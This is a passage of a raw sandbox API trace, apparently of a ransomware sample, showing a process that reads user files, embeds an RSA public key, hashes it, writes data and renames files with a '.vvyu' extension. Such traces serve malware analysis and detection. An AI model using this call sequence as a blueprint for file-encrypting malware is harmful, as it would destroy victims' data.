dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0196.569] GetCurrentThreadId () returned 0x5d8 [0196.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0196.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2030 [0196.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0196.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0196.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.570] GetCurrentThreadId () returned 0x5d8 [0196.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0196.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6698 [0196.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6638 [0196.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0196.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6650 [0196.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6620 [0196.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66b0 [0196.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0196.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6680 [0196.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6668 [0196.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66c8 [0196.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6668 | out: hHeap=0x2c0000) returned 1 [0196.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6668 [0196.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6680 | out: hHeap=0x2c0000) returned 1 [0196.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0196.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0196.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6638 | out: hHeap=0x2c0000) returned 1 [0196.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6638 [0196.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6698 | out: hHeap=0x2c0000) returned 1 [0196.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66c8 | out: hHeap=0x2c0000) returned 1 [0196.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6638 | out: hHeap=0x2c0000) returned 1 [0196.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0196.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6668 | out: hHeap=0x2c0000) returned 1 [0196.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66b0 | out: hHeap=0x2c0000) returned 1 [0196.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6650 | out: hHeap=0x2c0000) returned 1 [0196.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6620 | out: hHeap=0x2c0000) returned 1 [0196.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0196.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0196.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea380 | out: hHeap=0x2c0000) returned 1 [0196.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0196.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0196.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.582] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x8fe2, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x8fe2, lpOverlapped=0x0) returned 1 [0196.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.583] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x8fe7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.583] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0196.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0196.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0196.585] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.585] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.585] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.585] CloseHandle (hObject=0x584) returned 1 [0196.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0196.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x2af3f88 [0196.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0196.587] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\BXV5Ql2Id 9hKdXPV7.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\bxv5ql2id 9hkdxpv7.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\BXV5Ql2Id 9hKdXPV7.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\bxv5ql2id 9hkdxpv7.swf.vvyu")) returned 1 [0196.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.589] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0196.595] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c8da6d0, ftCreationTime.dwHighDateTime=0x1d8a667, ftLastAccessTime.dwLowDateTime=0x5c65aa00, ftLastAccessTime.dwHighDateTime=0x1d8a6a9, ftLastWriteTime.dwLowDateTime=0x5c65aa00, ftLastWriteTime.dwHighDateTime=0x1d8a6a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f6AdJjDhQ", cAlternateFileName="F6ADJJ~1")) returned 1 [0196.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0196.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x29b9f30 [0196.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31bb08 [0196.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0196.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0196.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0196.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05de8 | out: hHeap=0x2c0000) returned 1 [0196.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0196.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0196.597] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff00c970, ftCreationTime.dwHighDateTime=0x1d8a5cd, ftLastAccessTime.dwLowDateTime=0x8972d430, ftLastAccessTime.dwHighDateTime=0x1d8a73c, ftLastWriteTime.dwLowDateTime=0x8972d430, ftLastWriteTime.dwHighDateTime=0x1d8a73c, nFileSizeHigh=0x0, nFileSizeLow=0x10e2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oq0H.flv", cAlternateFileName="")) returned 1 [0196.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0196.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edc48 [0196.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0196.598] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\oq0H.flv") returned=".flv" [0196.598] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\oq0H.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\oq0h.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.598] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=69164) returned 1 [0196.598] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.602] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10e06, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.602] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.604] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.605] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x10e2c, lpOverlapped=0x0) returned 1 [0196.606] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.606] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.606] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.606] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0196.607] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0196.607] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.607] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.607] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.607] GetLastError () returned 0x0 [0196.607] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0196.607] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0196.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.608] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.608] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.608] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e30) returned 0x2af5168 [0196.608] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.609] 